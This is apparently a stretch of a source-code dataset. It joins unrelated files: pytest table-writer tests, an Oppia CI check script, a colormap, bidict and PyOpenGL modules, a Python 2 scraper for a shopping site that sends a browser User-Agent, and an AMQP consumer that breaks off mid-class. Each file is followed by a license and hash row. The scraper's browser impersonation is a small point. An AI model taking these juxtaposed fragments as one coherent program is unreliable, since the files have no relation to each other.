@pytest.mark.parametrize(
["table", "indent", "header", "value", "expected"],
[
[data.table, data.indent, data.header, data.value, data.expected]
for data in normal_test_data_list
],
)
def test_normal(self, capsys, table, indent, header, value, expected):
writer = table_writer_class()
writer.table_name = table
writer.set_indent_level(indent)
writer.headers = header
writer.value_matrix = value
writer.write_table()
out, err = capsys.readouterr()
print_test_result(expected=expected, actual=out, error=err)
assert out == expected
@pytest.mark.parametrize(
["table", "indent", "header", "value", "expected"],
[
[data.table, data.indent, data.header, data.value, data.expected]
for data in null_test_data_list
],
)
def test_exception_null(self, table, indent, header, value, expected):
writer = table_writer_class()
writer.table_name = table
writer.set_indent_level(indent)
writer.headers = header
writer.value_matrix = value
assert writer.dumps() == ""
@pytest.mark.parametrize(
["table", "indent", "header", "value", "expected"],
[
[data.table, data.indent, data.header, data.value, data.expected]
for data in [
Data(
table=None,
indent=0,
header=headers,
value=value_matrix,
expected="",
)
]
],
)
def test_exception(self, table, indent, header, value, expected):
writer = table_writer_class()
writer.table_name = table
writer.set_indent_level(indent)
writer.headers = header
writer.value_matrix = value
with pytest.raises(ptw.EmptyTableNameError):
writer.write_table()
class Test_NumpyTableWriter_write_table_iter:
@pytest.mark.parametrize(
["table", "header", "value", "expected"],
[
[
"tablename",
["ha", "hb", "hc"],
value_matrix_iter,
"""tablename = np.array([
["ha", "hb", "hc"],
[1, 2, 3],
[11, 12, 13],
[1, 2, 3],
[11, 12, 13],
[101, 102, 103],
[1001, 1002, 1003],
])
""",
]
],
)
def test_normal(self, capsys, table, header, value, expected):
writer = table_writer_class()
writer.table_name = table
writer.headers = header
writer.value_matrix = value
writer.iteration_length = len(value)
writer.write_table_iter()
out, _err = capsys.readouterr()
assert out == expected
@pytest.mark.parametrize(
["table", "header", "value", "expected"],
[[data.table, data.header, data.value, data.expected] for data in null_test_data_list],
)
def test_normal_empty(self, table, header, value, expected):
writer = table_writer_class()
writer.table_name = table
writer.headers = header
writer.value_matrix = value
writer.write_table_iter()
|
mit
| 4,589,981,548,541,643,000 | 26.534483 | 109 | 0.533187 | false |
prasanna08/oppia
|
scripts/check_e2e_tests_are_captured_in_ci.py
|
1
|
8956
|
# Copyright 2020 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A script to check that travis.yml file & protractor.conf.js have the
same e2e test suites.
"""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import os
import re
import python_utils
import utils
# These 4 test suites are not present in travis ci.
# One is extra (ie. (full: [*.js])) and three other test suites are
# are being run by CircleCI.
TEST_SUITES_NOT_RUN_ON_TRAVIS = [
'full', 'accessibility', 'adminPage', 'classroomPage',
'classroomPageFileUploadFeatures', 'collections', 'contributorDashboard',
'fileUploadExtensions', 'fileUploadFeatures', 'library', 'navigation',
'playVoiceovers', 'preferences', 'profileFeatures', 'profileMenu',
'publication', 'subscriptions', 'topicsAndSkillsDashboard',
'topicAndStoryEditor', 'topicAndStoryEditorFileUploadFeatures', 'users']
TRAVIS_CI_FILE_PATH = os.path.join(os.getcwd(), '.travis.yml')
PROTRACTOR_CONF_FILE_PATH = os.path.join(
os.getcwd(), 'core', 'tests', 'protractor.conf.js')
SAMPLE_TEST_SUITE_THAT_IS_KNOWN_TO_EXIST = 'coreEditorAndPlayerFeatures'
def get_e2e_suite_names_from_jobs_travis_yml_file():
"""Extracts the test suites from env/jobs section from
the .travis.yml file.
Returns:
list(str). An alphabetically-sorted list of names of test suites
from the jobs section in the .travis.yml file.
"""
travis_file_content = read_and_parse_travis_yml_file()
jobs_str = python_utils.convert_to_bytes(travis_file_content['env']['jobs'])
suites_from_jobs = []
# The following line extracts the test suite name from the jobs section
# that is in the form RUN_E2E_TESTS_ACCESSIBILITY=true.
test_regex = re.compile(r'RUN_E2E_TESTS_([A-Z_]*)=')
jobs = test_regex.findall(jobs_str)
for job in jobs:
suites_from_jobs.append(
utils.snake_case_to_camel_case(job.lower()))
return sorted(suites_from_jobs)
def get_e2e_suite_names_from_script_travis_yml_file():
"""Extracts the script section from the .travis.yml file.
Returns:
list(str). An alphabetically-sorted list of names of test suites
from the script section in the .travis.yml file.
"""
travis_file_content = read_and_parse_travis_yml_file()
script_str = python_utils.convert_to_bytes(travis_file_content['script'])
# The following line extracts the test suites from patterns like
# python -m scripts.run_e2e_tests --suite="accessibility".
e2e_test_suite_regex = re.compile(r'--suite="([a-zA-Z_-]*)"')
suites_list = e2e_test_suite_regex.findall(script_str)
return sorted(suites_list)
def get_e2e_suite_names_from_protractor_file():
"""Extracts the test suites section from the protractor.conf.js file.
Returns:
list(str). An alphabetically-sorted list of names of test suites
from the protractor.conf.js file.
"""
protractor_config_file_content = read_protractor_conf_file()
# The following line extracts suite object from protractor.conf.js.
suite_object_string = re.compile(
r'suites = {([^}]+)}').findall(protractor_config_file_content)[0]
# The following line extracts the keys/test suites from the "key: value"
# pair from the suites object.
key_regex = re.compile(r'\b([a-zA-Z_-]*):')
protractor_suites = key_regex.findall(suite_object_string)
return sorted(protractor_suites)
def read_protractor_conf_file():
"""Returns the contents of core/tests/protractor.conf.js file.
Returns:
str. The contents of protractor.conf.js, as a string.
"""
protractor_config_file_content = python_utils.open_file(
PROTRACTOR_CONF_FILE_PATH, 'r').read()
return protractor_config_file_content
def read_and_parse_travis_yml_file():
"""Returns the contents of .travis.yml, as a dict.
Returns:
dict. Contents of the .travis.yml file parsed as a dict.
"""
travis_ci_file_content = python_utils.open_file(
TRAVIS_CI_FILE_PATH, 'r').read()
travis_ci_dict = utils.dict_from_yaml(travis_ci_file_content)
return travis_ci_dict
def get_e2e_test_filenames_from_protractor_dir():
"""Extracts the names of the all test files in core/tests/protractor
and core/tests/protractor_desktop directory.
Returns:
list(str). An alphabetically-sorted list of of the all test files
in core/tests/protractor and core/tests/protractor_desktop directory.
"""
protractor_test_suite_files = []
protractor_files = os.path.join(
os.getcwd(), 'core', 'tests', 'protractor')
protractor_desktop_files = os.path.join(
os.getcwd(), 'core', 'tests', 'protractor_desktop')
for file_name in os.listdir(protractor_files):
protractor_test_suite_files.append(file_name)
for file_name in os.listdir(protractor_desktop_files):
protractor_test_suite_files.append(file_name)
return sorted(protractor_test_suite_files)
def get_e2e_test_filenames_from_protractor_conf_file():
"""Extracts the filenames from the suites object of
protractor.conf.js file.
Returns:
list(str). An alphabetically-sorted list of filenames extracted
from the protractor.conf.js file.
"""
protractor_config_file_content = read_protractor_conf_file()
# The following line extracts suite object from protractor.conf.js.
suite_object_string = re.compile(
r'suites = {([^}]+)}').findall(protractor_config_file_content)[0]
test_files_regex = re.compile(r'/([a-zA-Z]*.js)')
e2e_test_files = test_files_regex.findall(suite_object_string)
return sorted(e2e_test_files)
def main():
"""Test the travis ci file and protractor.conf.js to have same
e2e test suites.
"""
python_utils.PRINT(
'Checking all e2e test files are captured '
'in protractor.conf.js...')
protractor_test_suite_files = get_e2e_test_filenames_from_protractor_dir()
protractor_conf_test_suites = (
get_e2e_test_filenames_from_protractor_conf_file())
if not protractor_test_suite_files == protractor_conf_test_suites:
raise Exception(
'One or more test file from protractor or protractor_desktop '
'directory is missing from protractor.conf.js')
python_utils.PRINT('Done!')
python_utils.PRINT('Checking e2e tests are captured in .travis.yml...')
protractor_test_suites = get_e2e_suite_names_from_protractor_file()
travis_e2e_suites = get_e2e_suite_names_from_jobs_travis_yml_file()
travis_e2e_scripts = get_e2e_suite_names_from_script_travis_yml_file()
for excluded_test in TEST_SUITES_NOT_RUN_ON_TRAVIS:
protractor_test_suites.remove(excluded_test)
if not travis_e2e_suites:
raise Exception(
'The e2e test suites that have been extracted from '
'jobs section from travis.ci are empty.')
if not travis_e2e_scripts:
raise Exception(
'The e2e test suites that have been extracted from '
'script section from travis.ci are empty.')
if not protractor_test_suites:
raise Exception(
'The e2e test suites that have been extracted from '
'protractor.conf.js are empty.')
if SAMPLE_TEST_SUITE_THAT_IS_KNOWN_TO_EXIST not in travis_e2e_scripts:
raise Exception(
'{} is expected to be in the e2e test suites '
'extracted from the script section of .travis.yml '
'file, but it is missing.'
.format(SAMPLE_TEST_SUITE_THAT_IS_KNOWN_TO_EXIST))
if SAMPLE_TEST_SUITE_THAT_IS_KNOWN_TO_EXIST not in protractor_test_suites:
raise Exception(
'{} is expected to be in the e2e test suites '
'extracted from the protractor.conf.js file, '
'but it is missing.'
.format(SAMPLE_TEST_SUITE_THAT_IS_KNOWN_TO_EXIST))
if protractor_test_suites != travis_e2e_scripts:
raise Exception(
'Protractor test suites and Travis Ci test suites are not in sync.')
python_utils.PRINT('Done!')
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when check_e2e_tests_are_captured_in_ci.py
# is used as a script.
if __name__ == '__main__': # pragma: no cover
main()
|
apache-2.0
| -971,472,052,565,327,900 | 38.10917 | 80 | 0.682671 | false |
planetarymike/IDL-Colorbars
|
IDL_py_test/027_Eos_B.py
|
1
|
5942
|
from matplotlib.colors import LinearSegmentedColormap
from numpy import nan, inf
cm_data = [[1., 1., 1.],
[1., 1., 1.],
[0.498039, 0.498039, 0.498039],
[0., 0., 0.513725],
[0., 0., 0.533333],
[0., 0., 0.54902],
[0., 0., 0.564706],
[0., 0., 0.580392],
[0., 0., 0.6],
[0., 0., 0.615686],
[0., 0., 0.568627],
[0., 0., 0.584314],
[0., 0., 0.666667],
[0., 0., 0.682353],
[0., 0., 0.698039],
[0., 0., 0.713725],
[0., 0., 0.733333],
[0., 0., 0.74902],
[0., 0., 0.764706],
[0., 0., 0.780392],
[0., 0., 0.717647],
[0., 0., 0.733333],
[0., 0., 0.831373],
[0., 0., 0.847059],
[0., 0., 0.866667],
[0., 0., 0.882353],
[0., 0., 0.898039],
[0., 0., 0.913725],
[0., 0., 0.933333],
[0., 0., 0.94902],
[0., 0., 0.866667],
[0., 0., 0.882353],
[0., 0., 1.],
[0., 0.027451, 0.968627],
[0., 0.0588235, 0.937255],
[0., 0.0901961, 0.905882],
[0., 0.121569, 0.87451],
[0., 0.152941, 0.843137],
[0., 0.184314, 0.811765],
[0., 0.215686, 0.780392],
[0., 0.223529, 0.67451],
[0., 0.25098, 0.643137],
[0., 0.309804, 0.686275],
[0., 0.341176, 0.654902],
[0., 0.372549, 0.623529],
[0., 0.403922, 0.592157],
[0., 0.435294, 0.560784],
[0., 0.466667, 0.529412],
[0., 0.498039, 0.498039],
[0., 0.529412, 0.466667],
[0., 0.505882, 0.392157],
[0., 0.533333, 0.364706],
[0., 0.623529, 0.372549],
[0., 0.654902, 0.341176],
[0., 0.686275, 0.309804],
[0., 0.717647, 0.278431],
[0., 0.74902, 0.247059],
[0., 0.780392, 0.215686],
[0., 0.811765, 0.184314],
[0., 0.843137, 0.152941],
[0., 0.784314, 0.109804],
[0., 0.811765, 0.0823529],
[0., 0.937255, 0.0588235],
[0., 0.968627, 0.027451],
[0., 1., 0.],
[0.0352941, 1., 0.],
[0.0705882, 1., 0.],
[0.105882, 1., 0.],
[0.141176, 1., 0.],
[0.176471, 1., 0.],
[0.192157, 0.898039, 0.],
[0.223529, 0.898039, 0.],
[0.282353, 1., 0.],
[0.317647, 1., 0.],
[0.356863, 1., 0.],
[0.392157, 1., 0.],
[0.427451, 1., 0.],
[0.462745, 1., 0.],
[0.498039, 1., 0.],
[0.533333, 1., 0.],
[0.513725, 0.898039, 0.],
[0.545098, 0.898039, 0.],
[0.639216, 1., 0.],
[0.678431, 1., 0.],
[0.713725, 1., 0.],
[0.74902, 1., 0.],
[0.784314, 1., 0.],
[0.819608, 1., 0.],
[0.854902, 1., 0.],
[0.890196, 1., 0.],
[0.835294, 0.898039, 0.],
[0.866667, 0.898039, 0.],
[1., 1., 0.],
[1., 0.980392, 0.],
[1., 0.964706, 0.],
[1., 0.94902, 0.],
[1., 0.933333, 0.],
[1., 0.913725, 0.],
[1., 0.898039, 0.],
[1., 0.882353, 0.],
[0.898039, 0.776471, 0.],
[0.898039, 0.764706, 0.],
[1., 0.831373, 0.],
[1., 0.815686, 0.],
[1., 0.8, 0.],
[1., 0.780392, 0.],
[1., 0.764706, 0.],
[1., 0.74902, 0.],
[1., 0.733333, 0.],
[1., 0.713725, 0.],
[0.898039, 0.627451, 0.],
[0.898039, 0.611765, 0.],
[1., 0.662745, 0.],
[1., 0.647059, 0.],
[1., 0.631373, 0.],
[1., 0.615686, 0.],
[1., 0.6, 0.],
[1., 0.580392, 0.],
[1., 0.564706, 0.],
[1., 0.54902, 0.],
[0.898039, 0.478431, 0.],
[0.898039, 0.462745, 0.],
[1., 0.498039, 0.],
[1., 0.490196, 0.],
[1., 0.482353, 0.],
[1., 0.47451, 0.],
[1., 0.466667, 0.],
[1., 0.454902, 0.],
[1., 0.447059, 0.],
[1., 0.439216, 0.],
[0.898039, 0.388235, 0.],
[0.898039, 0.380392, 0.],
[1., 0.415686, 0.],
[1., 0.407843, 0.],
[1., 0.4, 0.],
[1., 0.388235, 0.],
[1., 0.380392, 0.],
[1., 0.372549, 0.],
[1., 0.364706, 0.],
[1., 0.356863, 0.],
[0.898039, 0.313725, 0.],
[0.898039, 0.305882, 0.],
[1., 0.329412, 0.],
[1., 0.321569, 0.],
[1., 0.313725, 0.],
[1., 0.305882, 0.],
[1., 0.298039, 0.],
[1., 0.290196, 0.],
[1., 0.282353, 0.],
[1., 0.27451, 0.],
[0.898039, 0.239216, 0.],
[0.898039, 0.231373, 0.],
[1., 0.247059, 0.],
[1., 0.239216, 0.],
[1., 0.231373, 0.],
[1., 0.223529, 0.],
[1., 0.215686, 0.],
[1., 0.207843, 0.],
[1., 0.196078, 0.],
[1., 0.188235, 0.],
[0.898039, 0.164706, 0.],
[0.898039, 0.156863, 0.],
[1., 0.164706, 0.],
[1., 0.156863, 0.],
[1., 0.14902, 0.],
[1., 0.141176, 0.],
[1., 0.129412, 0.],
[1., 0.121569, 0.],
[1., 0.113725, 0.],
[1., 0.105882, 0.],
[0.898039, 0.0862745, 0.],
[0.898039, 0.0823529, 0.],
[1., 0.0823529, 0.],
[1., 0.0745098, 0.],
[1., 0.0627451, 0.],
[1., 0.054902, 0.],
[1., 0.0470588, 0.],
[1., 0.0509804, 0.],
[1., 0.0313725, 0.],
[1., 0.0235294, 0.],
[0.898039, 0.0117647, 0.],
[0.898039, 0.00392157, 0.],
[1., 0., 0.],
[0.992157, 0., 0.],
[0.984314, 0., 0.],
[0.976471, 0., 0.],
[0.968627, 0., 0.],
[0.960784, 0., 0.],
[0.952941, 0., 0.],
[0.945098, 0., 0.],
[0.843137, 0., 0.],
[0.839216, 0., 0.],
[0.921569, 0., 0.],
[0.917647, 0., 0.],
[0.909804, 0., 0.],
[0.901961, 0., 0.],
[0.894118, 0., 0.],
[0.886275, 0., 0.],
[0.878431, 0., 0.],
[0.870588, 0., 0.],
[0.776471, 0., 0.],
[0.768627, 0., 0.],
[0.847059, 0., 0.],
[0.843137, 0., 0.],
[0.835294, 0., 0.],
[0.827451, 0., 0.],
[0.819608, 0., 0.],
[0.811765, 0., 0.],
[0.803922, 0., 0.],
[0.796078, 0., 0.],
[0.709804, 0., 0.],
[0.701961, 0., 0.],
[0.772549, 0., 0.],
[0.768627, 0., 0.],
[0.760784, 0., 0.],
[0.752941, 0., 0.],
[0.745098, 0., 0.],
[0.737255, 0., 0.],
[0.729412, 0., 0.],
[0.721569, 0., 0.],
[0.643137, 0., 0.],
[0.635294, 0., 0.],
[0.698039, 0., 0.],
[0.690196, 0., 0.],
[0.686275, 0., 0.],
[0.678431, 0., 0.],
[0.670588, 0., 0.],
[0.662745, 0., 0.],
[0.654902, 0., 0.],
[0.647059, 0., 0.],
[0.576471, 0., 0.],
[0.568627, 0., 0.],
[0.623529, 0., 0.],
[0.615686, 0., 0.],
[0.611765, 0., 0.],
[0.603922, 0., 0.],
[0.596078, 0., 0.],
[0.588235, 0., 0.],
[0.580392, 0., 0.],
[0.572549, 0., 0.],
[0.509804, 0., 0.],
[0.501961, 0., 0.],
[0.54902, 0., 0.],
[0.541176, 0., 0.],
[0.537255, 0., 0.],
[0.529412, 0., 0.],
[0.521569, 0., 0.],
[0.513725, 0., 0.],
[0.505882, 0., 0.],
[0.498039, 0., 0.],
[0.443137, 0., 0.],
[0.435294, 0., 0.],
[0.47451, 0., 0.],
[0.466667, 0., 0.],
[0.458824, 0., 0.],
[0.458824, 0., 0.]]
test_cm = LinearSegmentedColormap.from_list(__file__, cm_data)
if __name__ == "__main__":
import matplotlib.pyplot as plt
import numpy as np
try:
from pycam02ucs.cm.viscm import viscm
viscm(test_cm)
except ImportError:
print("pycam02ucs not found, falling back on simple display")
plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto',
cmap=test_cm)
plt.show()
|
gpl-2.0
| -4,094,152,691,494,448,000 | 20.686131 | 69 | 0.49411 | false |
jab/bidict
|
bidict/_delegating.py
|
1
|
1313
|
# -*- coding: utf-8 -*-
# Copyright 2009-2021 Joshua Bronson. All Rights Reserved.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""Provide :class:`_DelegatingBidict`."""
import typing as _t
from ._base import BidictBase
from ._typing import KT, VT
class _DelegatingBidict(BidictBase[KT, VT]):
"""Provide optimized implementations of several methods by delegating to backing dicts.
Used to override less efficient implementations inherited by :class:`~collections.abc.Mapping`.
"""
__slots__ = ()
def __iter__(self) -> _t.Iterator[KT]:
"""Iterator over the contained keys."""
return iter(self._fwdm)
def keys(self) -> _t.KeysView[KT]:
"""A set-like object providing a view on the contained keys."""
return self._fwdm.keys()
def values(self) -> _t.KeysView[VT]: # type: ignore # https://github.com/python/typeshed/issues/4435
"""A set-like object providing a view on the contained values."""
return self._invm.keys()
def items(self) -> _t.ItemsView[KT, VT]:
"""A set-like object providing a view on the contained items."""
return self._fwdm.items()
|
mpl-2.0
| 6,723,408,480,734,901,000 | 32.666667 | 106 | 0.658797 | false |
frederica07/Dragon_Programming_Process
|
PyOpenGL-3.0.2/OpenGL/GL/VERSION/GL_1_3.py
|
1
|
1829
|
'''OpenGL extension VERSION.GL_1_3
This module customises the behaviour of the
OpenGL.raw.GL.VERSION.GL_1_3 to provide a more
Python-friendly API
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/VERSION/GL_1_3.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.VERSION.GL_1_3 import *
### END AUTOGENERATED SECTION
from OpenGL.GL.VERSION.GL_1_3_images import *
GL_SRC0_ALPHA = GL_SOURCE0_ALPHA # alias
GL_SRC0_RGB = GL_SOURCE0_RGB # alias
GL_SRC1_ALPHA = GL_SOURCE1_ALPHA # alias
GL_SRC1_RGB = GL_SOURCE1_RGB # alias
GL_SRC2_ALPHA = GL_SOURCE2_ALPHA # alias
GL_SRC2_RGB = GL_SOURCE2_RGB # alias
for typ,arrayType in (
('d',arrays.GLdoubleArray),
('f',arrays.GLfloatArray),
('i',arrays.GLintArray),
('s',arrays.GLshortArray),
):
for size in (1,2,3,4):
name = 'glMultiTexCoord%(size)s%(typ)sv'%globals()
globals()[name] = arrays.setInputArraySizeType(
globals()[name],
size,
arrayType,
'v',
)
try:
del size,name
except NameError, err:
pass
try:
del typ,arrayType
except NameError, err:
pass
for typ,arrayType in (
('d',arrays.GLdoubleArray),
('f',arrays.GLfloatArray),
):
for function in ('glLoadTransposeMatrix','glMultTransposeMatrix'):
name = '%s%s'%(function,typ)
globals()[name] = arrays.setInputArraySizeType(
globals()[name],
16,
arrayType,
'm',
)
try:
del function,name
except NameError, err:
pass
try:
del typ,arrayType
except NameError, err:
pass
|
bsd-2-clause
| 7,089,357,555,982,002,000 | 26.298507 | 70 | 0.618917 | false |
GFibrizo/TPS_7529
|
TP1/Estadistico de orden K/fuerza_bruta.py
|
1
|
1235
|
def es_estadistico_orden_k(conjunto, candidato, k):
menores = 0
for elem in conjunto:
if elem < candidato:
menores += 1
return menores == k
################################################################################
################################################################################
def obtener_estadistico_orden_k(conjunto, k):
for elemento in conjunto:
if es_estadistico_orden_k(conjunto, elemento, k):
return elemento
return None
################################################################################
################################################################################
def test():
print obtener_estadistico_orden_k([1], 0) == 1
print obtener_estadistico_orden_k([2,1], 1) == 2
print obtener_estadistico_orden_k([3,1,4,2,7], 3) == 4
print obtener_estadistico_orden_k([1,2,3,4,5,6,7,8], 0) == 1
print obtener_estadistico_orden_k([1,2,3,4,5,6,7,8], 7) == 8
print obtener_estadistico_orden_k([1,2,3,4,5,6,7,8], 4) == 5
################################################################################
################################################################################
test()
|
apache-2.0
| -2,356,529,184,397,459,000 | 38.83871 | 80 | 0.364372 | false |
google-research/google-research
|
nigt_optimizer/nigt_test.py
|
1
|
1295
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Test for nigt optimizer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
from tensorflow.compat.v1 import test
from nigt_optimizer.nigt_optimizer import NIGTOptimizer
class NIGTOptimizerTest(test.TestCase):
def testRunsMinimize(self):
nigt = NIGTOptimizer(1.0)
w = tf.Variable([3.0])
loss = tf.square(w)
update_op = nigt.minimize(loss, var_list=[w])
if not tf.executing_eagerly():
self.evaluate(tf.initializers.global_variables())
for _ in range(3):
self.evaluate(update_op)
if __name__ == '__main__':
test.main()
|
apache-2.0
| -5,804,821,532,759,230,000 | 28.431818 | 74 | 0.722008 | false |
ifengkou/python_splider
|
history/smzdm_splider_re.py
|
1
|
4876
|
# -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )
import string
import urllib2
import re
import json
class HTML_Tool:
# 用 非贪婪模式 匹配 \t 或者\n 或者 空格超链接 和图片
BgnCharToNoneRex = re.compile("(\t|\n|\r| |<a.*?>|<img.*?>)")
#用 非贪婪模式 陪 任意 <>
EndCharToNoneRex = re.compile("<.*?>")
#用 非贪婪模式匹配 任意 <p> 标签
BgnPartRex = re.compile("<p.*?>")
CharToNewLineRex =re.compile("(<br />|</p>|<tr>|<div>|</div>)")
CharToNewTabRex = re.compile("<td>")
#将一些html符号尸体转变为原始符号
replaceTab = [("<","<"),(">",">"),("&","&"),("&","\""),(" "," ")]
def Replace_Char(self,x):
x = self.BgnCharToNoneRex.sub("",x)
x = self.BgnPartRex.sub("\n ",x)
x = self.CharToNewLineRex.sub("\n",x)
x = self.CharToNewTabRex.sub("\t",x)
x = self.EndCharToNoneRex.sub("",x)
for t in self.replaceTab:
x = x.replace(t[0],t[1])
return x
class Smzdm_Spider:
#申明相关的属性
def __init__(self,url):
self.myUrl = url
self.datas = []
self.myTool = HTML_Tool()
self.encoding = "utf-8"
#定义 标签的数据结构
##标签 分为 3个层级,用[map]
##库 用 parentid 表示
self.categories = []
print u'已经启动smzdm商品百科爬虫,咔嚓咔嚓'
def spider_start(self):
#读取页面的原始信息并将其从gbk转码
user_agent = 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'
headers = { 'User-Agent' : user_agent }
req = urllib2.Request(self.myUrl, headers = headers)
# myPage = urllib2.urlopen(self.myUrl).read().decode(self.encoding)
myPage = urllib2.urlopen(req).read().decode(self.encoding)
# 处理分类
self.get_categoris(myPage)
#打印分类,(或者存储分类)
print json.dumps(self.categories,ensure_ascii=False)
def get_categoris(self,myPage):
myMatch = re.search(r'ul id="left-category" class="category_box">(.*?)</ul>',myPage,re.S)
if myMatch:
print u'爬虫报告:发现分类信息'
category_content = myMatch.group(1)
self.hand_category(category_content)
else:
print u'爬虫报告:未发现分类信息'
def hand_category(self,content):
myItems = re.findall('<li class.*?>(.*?)</li>',content,re.S)
print len(myItems)
for item in myItems:
parentMatch = re.search(r'h2>.*?<a href=.*?>(.*?)</a>.*?</h2>',item,re.S)
if parentMatch:
parentItem = parentMatch.group(1)
categoryName = self.myTool.Replace_Char(parentItem.replace("\n","").encode(self.encoding))
subMatch = re.search(r'dl class="sub_category.*?>(.*?)</dl>',item,re.S)
if subMatch:
subItems = subMatch.group(1)
subs = self.hand_sub(subItems)
category = {}
category[categoryName] = subs
self.categories.append(category)
else:
print u'爬虫报告:未发现子分类信息'
else:
print u'爬虫报告:未发现父分类信息'
def hand_sub(self,content):
sub0s = self.hand_sub0(content)
sub1s = self.hand_sub1(content)
subs = []
if len(sub0s) == len(sub1s):
i = 0
for sub0 in sub0s:
sub_dict = {}
sub_dict[str(sub0)] = sub1s[i]
i += 1
subs.append(sub_dict)
else:
print u'二级分类及二级分类子内容 长度不匹配'
return subs
def hand_sub0(self,content):
myItems = re.findall('<dt>.*?<a.*?>(.*?)</a>.*?</dt>',content,re.S)
sub0s = []
for item in myItems:
sub0s.append(self.myTool.Replace_Char(item.replace("\n","")))
return sub0s
def hand_sub1(self,content):
myItems = re.findall('<dd>(.*?)</dd>',content,re.S)
children = []
for item in myItems:
sub1s = []
myChildren = re.findall('<a.*?>(.*?)</a>',item,re.S)
for child in myChildren:
sub1s.append(self.myTool.Replace_Char(child.replace("\n","").encode(self.encoding)))
children.append(sub1s)
return children
# ---------- 程序入口 --------------
print """#----------------------------
# 程序:smzdm爬虫
# 功能:爬取 smzdm优质商品信息
#----------------------------------------
"""
#wiki 首页
url = 'http://wiki.smzdm.com/youxuan'
mySpider = Smzdm_Spider(url)
mySpider.spider_start()
|
mit
| 8,403,273,562,992,043,000 | 30.7 | 131 | 0.520955 | false |
ebilionis/variational-reformulation-of-inverse-problems
|
unittests/test_cached_function.py
|
1
|
1091
|
"""
Tests the vuq.CachedFunction decorator.
Author:
Ilias Bilionis
Date:
6/6/2014
"""
import numpy as np
import time
from vuq import *
# Test the evaluation of a cached and of an un-cached function
# An expensive function
def f(x):
for i in xrange(1000):
x += i
x /= 1000000
return 2. * x
#@CachedFunction()
def f_c(x):
return f(x)
class Foo(object):
def __init__(self):
self._f = f
def __call__(self, x):
return self._f(x)
class FooCached(object):
def __init__(self):
self._f = f
def __call__(self, x):
return self._f(x)
# A set of points to evaluate the function repeatedly
X = np.random.rand(10, 10)
# How many repetitions to do
num_repeat = 1000
F = Foo()
Fc = CachedFunction(F.__call__)
t0 = time.time()
for i in xrange(num_repeat):
y = F(X[i % X.shape[0], :])
t1 = time.time()
print 'Elapsed time without cache (seconds):', t1 - t0
t0 = time.time()
for i in xrange(num_repeat):
y = Fc(X[i % X.shape[0], :])
t1 = time.time()
print 'Elapsed time with cache (seconds):', t1 - t0
|
gpl-2.0
| -7,619,550,343,440,725,000 | 15.283582 | 62 | 0.597617 | false |
kgiusti/gofer
|
src/gofer/messaging/consumer.py
|
1
|
4280
|
# Copyright (c) 2013 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public
# License as published by the Free Software Foundation; either version
# 2 of the License (GPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should
# have received a copy of GPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
from time import sleep
from logging import getLogger
from gofer.common import Thread, released
from gofer.messaging.model import DocumentError
from gofer.messaging.adapter.model import Reader
log = getLogger(__name__)
class ConsumerThread(Thread):
"""
An AMQP (abstract) consumer.
"""
def __init__(self, node, url, wait=3):
"""
:param node: An AMQP queue.
:type node: gofer.messaging.adapter.model.Node
:param url: The broker URL.
:type url: str
:param wait: Number of seconds to wait for a message.
:type wait: int
"""
Thread.__init__(self, name=node.name)
self.url = url
self.node = node
self.wait = wait
self.authenticator = None
self.reader = None
self.setDaemon(True)
def shutdown(self):
"""
Shutdown the consumer.
"""
self.abort()
@released
def run(self):
"""
Main consumer loop.
"""
self.reader = Reader(self.node, self.url)
self.reader.authenticator = self.authenticator
self.open()
try:
while not Thread.aborted():
self.read()
finally:
self.close()
def open(self):
"""
Open the reader.
"""
while not Thread.aborted():
try:
self.reader.open()
break
except Exception:
log.exception(self.getName())
sleep(30)
def close(self):
"""
Close the reader.
"""
try:
self.reader.close()
except Exception:
log.exception(self.getName())
def read(self):
"""
Read and process incoming documents.
"""
try:
wait = self.wait
reader = self.reader
message, document = reader.next(wait)
if message is None:
# wait expired
return
log.debug('{%s} read: %s', self.getName(), document)
self.dispatch(document)
message.ack()
except DocumentError, de:
self.rejected(de.code, de.description, de.document, de.details)
except Exception:
log.exception(self.getName())
sleep(60)
self.close()
self.open()
def rejected(self, code, description, document, details):
"""
Called to process the received (invalid) document.
This method intended to be overridden by subclasses.
:param code: The rejection code.
:type code: str
:param description: rejection description
:type description: str
:param document: The received *json* document.
:type document: str
:param details: The explanation.
:type details: str
"""
log.debug('rejected: %s', document)
def dispatch(self, document):
"""
Called to process the received document.
This method intended to be overridden by subclasses.
:param document: The received *json* document.
:type document: str
"""
log.debug('dispatched: %s', document)
class Consumer(ConsumerThread):
"""
